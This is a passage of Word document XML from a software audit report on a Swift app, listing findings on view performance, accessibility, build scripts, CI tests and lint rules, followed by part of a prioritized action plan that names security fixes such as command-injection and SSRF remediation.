      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The input card accepts 31 parameters in its initializer, creating excessive dependency injection. Any parent change forces a complete redraw.</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Group bindings into InputState and ActionCallbacks structs. Extract sub-views for attachment bar and model selector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#43  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">10+ @ObservedObject in ManagementView</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Views/Management/ManagementView.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 15-30)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ManagementView observes 10+ singleton managers. Changing the plugin repo triggers the entire management UI to redraw, causing sidebar jank.</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Extract focused sub-views that each observe only their relevant manager. Use EquatableView where possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#44  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">No Semantic Accessibility for Message Types</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Views/Chat/MessageThreadView.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 12-93)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The message thread has no .accessibilityElement() grouping by role. Screen readers announce every cell individually without distinguishing assistant messages from tool calls or thinking blocks.</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Add role-based accessibility labels (e.g., 'Message from Assistant'). Group content blocks with .accessibilityElement(children: .combine).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#45  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">AnimatedOrb Continuous GPU Rendering</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Views/Common/AnimatedOrb.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 60-80)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Metal shader renders at 60fps even when off-screen. Sidebar orbs that are scrolled out of view continue consuming GPU cycles and draining battery.</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Stop animations in onDisappear. Implement idle state after 5 seconds without interaction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Build System &amp; CI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The GitHub Actions workflows, build scripts, linting configuration, and test coverage were audited for reliability, completeness, and correctness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#46  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">No Error Context in Build Scripts</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scripts/build/build_arm64.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 22-73)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Build script has no diagnostic error messages. Code signing failures are silent. Export archive failures produce no context. Release builds fail unpredictably with no indication of root cause.</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Add error_exit() function with descriptive messages. Verify code signing success explicitly. Check ExportOptions.plist validity before use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#47  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CI Skips Critical ML Test Suites</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.github/workflows/ci.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 47-55)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">KVCacheStoreTests and MLXGenerationEngineTests are permanently skipped. ML runtime and cache layer regressions go undetected.</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Create a separate GPUTests CI job on self-hosted Apple Silicon runners. Or gate these tests with environment variables rather than permanent skip.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#48  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ShellCheck at Warning Level Only</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.github/workflows/ci.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 105-115)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ShellCheck runs at --severity=warning, missing errors like unquoted variables causing word splitting and pipe failures in build scripts.</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Run at --severity=error with --enable=require-variable-braces,require-quoted-arguments. Add POSIX compliance check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#49  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Placeholder UI Tests</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App/osaurusUITests/osaurusUITests.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 35-48)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">All UI tests are skipped placeholders. Layout regressions, broken buttons, and accessibility issues are never caught in CI.</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Implement focused UI test suite: input field responsiveness, send button state, model selector functionality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#50  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">SwiftLint Disables 11 Critical Rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="555555"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">.swiftlint.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 13-25)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">line_length, type_body_length, file_length, function_body_length, cyclomatic_complexity, and function_parameter_count are all disabled. This permits the 31-parameter init, 500-line view bodies, and deeply nested closures found elsewhere in this audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Re-enable rules with reasonable thresholds: line_length 120/160, type_body_length 300/500, function_parameter_count 6/10, cyclomatic_complexity 10/20.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Prioritized Action Plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E86C1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate (This Week)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">These issues involve crashes, data loss, or exploitable security vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix SQLite null pointer dereferences in MemoryDatabase.swift (#15) — prevents crashes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Store DeviceKey ID and Counter in Keychain instead of UserDefaults (#7, #8) — prevents replay attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate shell metacharacters in sandbox setup commands (#30) — prevents command injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitize plugin HTTP headers in HostAPI (#31) — prevents header injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix SSRF IPv6 loopback bypass (#32) — prevents internal network access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Quote working directory in shell commands (#34) — prevents command injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Add error context to build scripts (#46) — prevents silent release failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E86C1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-Term (Next 2 Sprints)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">These issues affect reliability, performance, and code quality:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement certificate pinning for relay WebSocket (#9)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Add database indexes for common memory queries (#19)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix MemoryService actor race conditions (#16)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace nonisolated(unsafe) patterns with proper actor isolation (#23, #41)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Add accessibility labels to all interactive chat elements (#40, #44)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
